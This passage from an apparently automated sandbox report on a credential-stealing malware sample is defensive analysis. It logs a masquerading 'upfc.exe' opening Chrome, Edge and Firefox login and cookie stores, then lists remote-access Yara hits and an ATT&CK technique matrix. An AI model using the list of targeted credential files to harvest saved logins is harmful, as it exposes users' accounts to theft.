            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.1377650559.0000000012C0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Blockruntime.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 5068, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 6524, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RZctPlhC2XmeDKsE7v.exe PID: 7188, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RZctPlhC2XmeDKsE7v.exe PID: 7256, type: MEMORYSTR
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts241
            Windows Management Instrumentation
            11
            Scripting
            1
            DLL Side-Loading
            21
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            12
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory2
            File and Directory Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            3
            Obfuscated Files or Information
            Security Account Manager157
            System Information Discovery
            SMB/Windows Admin Shares1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Software Packing
            NTDS361
            Security Software Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets2
            Process Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
            Masquerading
            Cached Domain Credentials251
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
            Virtualization/Sandbox Evasion
